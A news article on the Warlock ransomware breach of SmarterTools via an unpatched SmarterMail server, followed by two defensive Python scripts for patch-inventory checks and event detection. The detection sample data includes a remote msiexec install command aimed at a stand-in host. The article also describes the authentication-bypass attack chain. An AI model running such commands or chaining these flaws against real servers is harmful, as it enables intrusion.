Warlock Ransomware Exploits Unpatched SmarterMail Server to Breach SmarterTools
In a recent cybersecurity incident, SmarterTools, a provider of communication and collaboration software, fell victim to the Warlock ransomware group, also known as Storm-2603. The breach occurred on January 29, 2026, when attackers exploited an unpatched instance of SmarterMail, the company’s email server software.
Derek Curtis, Chief Commercial Officer at SmarterTools, detailed the circumstances leading to the breach. He explained that the company maintained approximately 30 servers and virtual machines running SmarterMail across its network. However, an employee had set up a virtual machine that was not included in the regular update process. This oversight left the server vulnerable, providing an entry point for the attackers.
Despite the breach, SmarterTools assured that critical services such as their website, shopping cart, My Account portal, and other business applications remained unaffected. No customer account data was compromised during the incident.
The attack impacted about 12 Windows servers within the company’s office network and a secondary data center used for quality control testing. CEO Tim Uzzanti noted that hosted customers using SmarterTrack, the company’s customer service software, were particularly affected. This was not due to vulnerabilities within SmarterTrack itself but because the environment was more accessible once the network was breached.
The attackers demonstrated patience and strategic planning. After gaining initial access, they waited several days before taking control of the Active Directory server, creating new user accounts, and deploying additional malicious payloads, including Velociraptor and file-encrypting ransomware. Curtis highlighted that this delay explains why some customers experienced issues even after updating their systems—the initial breach occurred before the updates, but the malicious activities were triggered later.
The specific vulnerability exploited in SmarterMail remains unidentified. However, it’s noteworthy that several vulnerabilities in the software have been actively exploited in the wild. These include CVE-2025-52691, a critical flaw with a CVSS score of 10.0, and two high-severity vulnerabilities, CVE-2026-23760 and CVE-2026-24423, each with a CVSS score of 9.3.
CVE-2026-23760 is an authentication bypass vulnerability that allows attackers to reset the SmarterMail system administrator password by sending a specially crafted HTTP request. CVE-2026-24423 exploits a weakness in the ConnectToHub API method, enabling unauthenticated remote code execution. SmarterTools addressed these vulnerabilities in build 9511. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that CVE-2026-24423 has been exploited in ransomware attacks.
Cybersecurity firm ReliaQuest reported activity likely linked to the Warlock group, involving the exploitation of CVE-2026-23760 to bypass authentication and deploy ransomware on internet-facing systems. The attackers used their initial access to download a malicious MSI installer from Supabase, a legitimate cloud-based backend platform, to install Velociraptor.
Security researcher Alexa Feminella explained that while the vulnerability allows attackers to bypass authentication and reset administrator passwords, Storm-2603 combines this access with SmarterMail’s built-in ‘Volume Mount’ feature to gain full system control. Upon entry, the group installs Velociraptor, a legitimate digital forensics tool they have used in previous campaigns, to maintain access and set the stage for ransomware deployment.
The attackers’ method of chaining vulnerabilities and leveraging legitimate features suggests a sophisticated approach aimed at evading detection. By abusing legitimate functionalities like password resets and drive mounting, they reduce the effectiveness of detections tuned specifically for known remote code execution patterns.
This incident underscores the critical importance of keeping software up to date and applying security patches promptly. Organizations are advised to upgrade to the latest version of SmarterMail (Build 9526) immediately. Additionally, isolating mail servers from the rest of the network limits the lateral movement attackers rely on to deploy ransomware.
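The root cause described above was a SmarterMail virtual machine that existed on the network but was never enrolled in the update process. The following Python script is an added example (not SmarterTools code or anything from the article) showing the reconciliation check a defender would run: compare the hosts actually discovered on the network against the patch-management inventory, and flag any host that is unmanaged or below the minimum build. Both inventories below are constructed sample data; the CSV column names and the minimum build (9526, the fixed build the article names) are assumptions of this example.

```python
"""
Reconcile network-discovered SmarterMail hosts against the patch-management
inventory. Added example; the inventories and column names are constructed.
"""
import csv
import io
from dataclasses import dataclass

# Minimum acceptable SmarterMail build (the fixed build named in the article).
MIN_BUILD = 9526

# Constructed sample: hosts seen on the network and the build each reports.
DISCOVERED = """\
host,build
mail01.corp.example,9526
mail02.corp.example,9526
qa-mail07.corp.example,9511
vm-test-mail.corp.example,9480
"""

# Constructed sample: hosts enrolled in the regular update process.
MANAGED = """\
host
mail01.corp.example
mail02.corp.example
qa-mail07.corp.example
"""


@dataclass(frozen=True)
class Finding:
    host: str
    build: int
    reason: str


def parse_discovered(text):
    """Map host -> reported build from the discovery export."""
    return {row["host"]: int(row["build"]) for row in csv.DictReader(io.StringIO(text))}


def parse_managed(text):
    """Set of hosts the patch-management system knows about."""
    return {row["host"] for row in csv.DictReader(io.StringIO(text))}


def reconcile(discovered, managed, min_build=MIN_BUILD):
    """Flag hosts that are unmanaged (shadow VMs) or running an old build.

    A host can produce two findings: being unmanaged is reported separately
    from being out of date, because each needs a different fix.
    """
    findings = []
    for host, build in sorted(discovered.items()):
        if host not in managed:
            findings.append(Finding(host, build, "not enrolled in patch management"))
        if build < min_build:
            findings.append(Finding(host, build, f"build {build} below minimum {min_build}"))
    return findings


if __name__ == "__main__":
    for f in reconcile(parse_discovered(DISCOVERED), parse_managed(MANAGED)):
        print(f"{f.host}\tbuild {f.build}\t{f.reason}")
```

Run against the sample data, the check reports the out-of-date QA server once and the unmanaged test VM twice (unmanaged and out of date); the second category is the one that matters most, because an unmanaged host will stay vulnerable no matter how disciplined the patch cycle is.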
The Warlock ransomware group has a history of exploiting unpatched systems. In previous campaigns, they have targeted vulnerabilities in SharePoint servers to deploy ransomware. Their tactics often involve exploiting known vulnerabilities shortly after patches are released, highlighting the need for organizations to stay vigilant and proactive in their cybersecurity measures.
The misuse of legitimate tools like Velociraptor by threat actors further complicates the cybersecurity landscape. While such tools are designed for digital forensics and incident response, in the wrong hands, they can be repurposed for malicious activities. This dual-use nature of cybersecurity tools necessitates careful monitoring and control over their deployment within organizational networks.
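The post-compromise sequence described earlier (a remote MSI installer fetched to stage Velociraptor, new Active Directory accounts created days after initial access, and a Velociraptor service installed across hosts) maps onto standard Windows event sources a defender already collects. The Python script below is an added example, not code from the article or from any vendor, that runs three detection rules over a handful of constructed event records and computes the dwell time between the earliest finding and the first account creation. The flat per-event dictionary format is an assumption (a SIEM export would look similar); the Windows event IDs used are real: 4720 (user account created), 7045 (service installed) and 4688 (process creation). All hostnames, usernames, URLs and timestamps are constructed.

```python
"""
Detection rules over constructed Windows event records for the activity the
article describes. Added example; event format and all sample values are
constructed, the event IDs (4720, 7045, 4688) are standard Windows IDs.
"""
from dataclasses import dataclass
from datetime import datetime

# Constructed sample events (ISO 8601 timestamps, UTC).
EVENTS = [
    {"time": "2026-01-29T10:14:00", "host": "vm-test-mail", "event_id": 4688,
     "process": "C:\\Windows\\System32\\msiexec.exe",
     "command_line": "msiexec.exe /i https://example.invalid/agent.msi /qn"},
    {"time": "2026-01-30T08:00:00", "host": "mail01", "event_id": 4688,
     "process": "C:\\Windows\\System32\\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"time": "2026-02-02T10:14:00", "host": "dc01", "event_id": 4720,
     "target_user": "svc_backup2", "subject_user": "CORP\\admin"},
    {"time": "2026-02-02T10:20:00", "host": "dc01", "event_id": 7045,
     "service_name": "Velociraptor",
     "image_path": "C:\\Program Files\\Velociraptor\\velociraptor.exe service run"},
    {"time": "2026-02-02T10:40:00", "host": "qa-mail07", "event_id": 7045,
     "service_name": "Velociraptor",
     "image_path": "C:\\Program Files\\Velociraptor\\velociraptor.exe service run"},
]


@dataclass(frozen=True)
class Finding:
    time: datetime
    host: str
    rule: str
    detail: str


def detect(events):
    """Apply three rules and return findings in time order."""
    findings = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        eid = e["event_id"]
        if eid == 4720:
            # Any new account on a domain controller is worth a look; an
            # attacker-created account is how persistence was obtained here.
            findings.append(Finding(t, e["host"], "account_created",
                                    e.get("target_user", "?")))
        elif eid == 7045:
            # Velociraptor is legitimate DFIR tooling; the point is whether the
            # IR team installed it. Unplanned installs are the signal.
            blob = (e.get("service_name", "") + " " + e.get("image_path", "")).lower()
            if "velociraptor" in blob:
                findings.append(Finding(t, e["host"], "velociraptor_service",
                                        e.get("image_path", "")))
        elif eid == 4688:
            # msiexec pulling a package straight from a URL is rare in
            # managed environments and matches the staging step described.
            proc = e.get("process", "").lower()
            cmd = e.get("command_line", "").lower()
            if proc.endswith("msiexec.exe") and "http" in cmd:
                findings.append(Finding(t, e["host"], "remote_msi_install",
                                        e.get("command_line", "")))
    return sorted(findings, key=lambda f: f.time)


def dwell_days(findings):
    """Days from the earliest finding to the first AD account creation."""
    if not findings:
        return None
    created = [f for f in findings if f.rule == "account_created"]
    if not created:
        return None
    return (created[0].time - findings[0].time).total_seconds() / 86400


if __name__ == "__main__":
    results = detect(EVENTS)
    for f in results:
        print(f"{f.time.isoformat()} {f.host:<14} {f.rule:<22} {f.detail}")
    print(f"dwell before AD account creation: {dwell_days(results)} days")
```

The dwell-time figure is the operational lesson: on the sample data the remote installer on the mail host precedes the account creation on the domain controller by four days, which is why patching the mail server after the fact did not undo the intrusion. A service-install rule that simply allow-lists Velociraptor would have missed the second and third findings; pairing the rule with a change-ticket lookup is the usual way to keep the tool usable for the IR team without giving an intruder a free pass.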
In conclusion, the breach of SmarterTools by the Warlock ransomware group serves as a stark reminder of the ever-evolving tactics employed by cybercriminals. It emphasizes the necessity for organizations to maintain rigorous patch management practices, monitor for unauthorized system changes, and educate employees about the risks associated with unpatched software and unauthorized system configurations.